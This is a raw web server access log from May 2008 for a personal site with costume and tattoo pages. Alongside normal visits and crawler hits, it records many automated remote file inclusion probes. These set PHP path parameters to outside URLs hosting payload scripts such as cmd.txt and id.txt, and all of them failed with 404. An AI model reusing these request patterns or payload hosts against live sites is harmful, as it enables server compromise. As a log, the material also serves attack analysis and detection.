200.249.155.6 - - [23/May/2008:00:47:07 -0500] "GET /logs//login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.249.155.6 - - [23/May/2008:00:47:13 -0500] "GET //login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.6.87.108 - - [23/May/2008:00:51:37 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.145.146.10 - - [23/May/2008:00:56:01 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
212.145.146.10 - - [23/May/2008:00:56:01 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
212.145.146.10 - - [23/May/2008:00:56:02 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
67.195.51.238 - - [23/May/2008:00:58:52 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.106.96.182 - - [23/May/2008:01:04:49 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
89.106.96.182 - - [23/May/2008:01:04:49 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
85.227.145.193 - - [23/May/2008:01:13:18 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.76"
85.227.145.193 - - [23/May/2008:01:13:48 -0500] "GET /logs/access_log.1207008000//Neos_Chronos/header.php?base_folder=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.76"
207.61.144.44 - - [23/May/2008:01:17:10 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.76"
85.21.96.188 - - [23/May/2008:01:18:47 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
85.21.96.188 - - [23/May/2008:01:18:48 -0500] "GET //Neos_Chronos/header.php?base_folder=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
85.21.96.188 - - [23/May/2008:01:18:48 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
207.61.144.44 - - [23/May/2008:01:18:49 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.76"
85.21.96.188 - - [23/May/2008:01:20:22 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
24.93.105.27 - - [23/May/2008:01:23:31 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
62.141.39.30 - - [23/May/2008:01:24:16 -0500] "GET /logs/administrator/components/com_mambowiki/admin.a6mambocredits.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
62.141.39.30 - - [23/May/2008:01:24:17 -0500] "GET /administrator/components/com_mambowiki/admin.a6mambocredits.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
24.93.105.27 - - [23/May/2008:01:24:47 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
74.208.111.178 - - [23/May/2008:01:25:32 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jamesbrown.t35.com/id2.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.208.111.178 - - [23/May/2008:01:25:32 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://jamesbrown.t35.com/id2.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
65.55.208.136 - - [23/May/2008:01:25:49 -0500] "GET /logs/access_log.1179360000 HTTP/1.1" 200 140975 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.250.121.2 - - [23/May/2008:01:25:55 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
200.250.121.2 - - [23/May/2008:01:25:55 -0500] "GET //Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.250.121.2 - - [23/May/2008:01:25:56 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
200.250.121.2 - - [23/May/2008:01:28:12 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
200.249.155.6 - - [23/May/2008:01:28:19 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
200.249.155.6 - - [23/May/2008:01:28:23 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
58.65.166.58 - - [23/May/2008:01:30:16 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:21 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:21 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:22 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:24 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
58.65.166.58 - - [23/May/2008:01:30:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
85.227.145.193 - - [23/May/2008:01:31:36 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.76"
85.227.145.193 - - [23/May/2008:01:32:00 -0500] "GET /logs/access_log.1207008000//Neos_Chronos/header.php?base_folder=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.76"
200.250.121.2 - - [23/May/2008:01:34:39 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
200.250.121.2 - - [23/May/2008:01:34:40 -0500] "GET //Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.250.121.2 - - [23/May/2008:01:34:40 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
85.227.145.193 - - [23/May/2008:01:35:02 -0500] "GET /logs/sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.76"
85.227.145.193 - - [23/May/2008:01:35:02 -0500] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.76"
217.198.149.178 - - [23/May/2008:01:35:10 -0500] "GET /logs/sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
217.198.149.178 - - [23/May/2008:01:35:10 -0500] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
80.67.174.41 - - [23/May/2008:01:35:26 -0500] "GET /logs/sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
80.67.174.41 - - [23/May/2008:01:35:26 -0500] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
74.6.17.181 - - [23/May/2008:01:36:15 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.181 - - [23/May/2008:01:36:15 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.250.121.2 - - [23/May/2008:01:36:40 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://edan.fileave.com/cmd.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
80.224.34.28 - - [23/May/2008:01:41:06 -0500] "GET /logs/sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.808"
80.224.34.28 - - [23/May/2008:01:41:06 -0500] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://pacrimcreations.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.808"
209.164.178.178 - - [23/May/2008:01:52:20 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://203.204.97.53/phpBB2/images/avatars/on.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
209.164.178.178 - - [23/May/2008:01:52:20 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://203.204.97.53/phpBB2/images/avatars/on.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
213.203.222.50 - - [23/May/2008:01:53:39 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://revista.scoalaparintilor.ro//includes//phpmailer/on.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
213.203.222.50 - - [23/May/2008:01:53:39 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://revista.scoalaparintilor.ro//includes//phpmailer/on.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
69.66.126.153 - - [23/May/2008:01:57:19 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.yahoo.com/search?ei=utf-8&fr=slv8-ytbm&p=vintage%20tattoo%20flash&type=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:19 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:19 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:45 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:45 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:45 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:46 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:46 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:48 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:49 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:49 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:49 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:50 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:57:51 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:15 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:15 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:16 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:16 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:16 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:16 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:17 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:17 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:18 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:18 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:18 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:41 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:41 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:41 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
69.66.126.153 - - [23/May/2008:01:58:41 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={A34D6488-E30E-4201-A291-EDBC2A8F8875}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; Tablet PC 2.0)"
61.222.167.228 - - [23/May/2008:01:58:45 -0500] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
61.222.167.228 - - [23/May/2008:01:59:01 -0500] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
198.173.255.66 - - [23/May/2008:02:00:38 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://revista.scoalaparintilor.ro//includes//phpmailer/on.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
65.55.209.1 - - [23/May/2008:02:07:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.1 - - [23/May/2008:02:07:21 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
204.92.87.157 - - [23/May/2008:02:07:46 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.811"
204.92.87.157 - - [23/May/2008:02:07:47 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.811"
198.173.255.66 - - [23/May/2008:02:08:20 -0500] "GET /logs/access_log.1207785600//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://revista.scoalaparintilor.ro//includes//phpmailer/on.txt??? HTTP/1.1" 404 373 "-""libwww-perl/5.65"
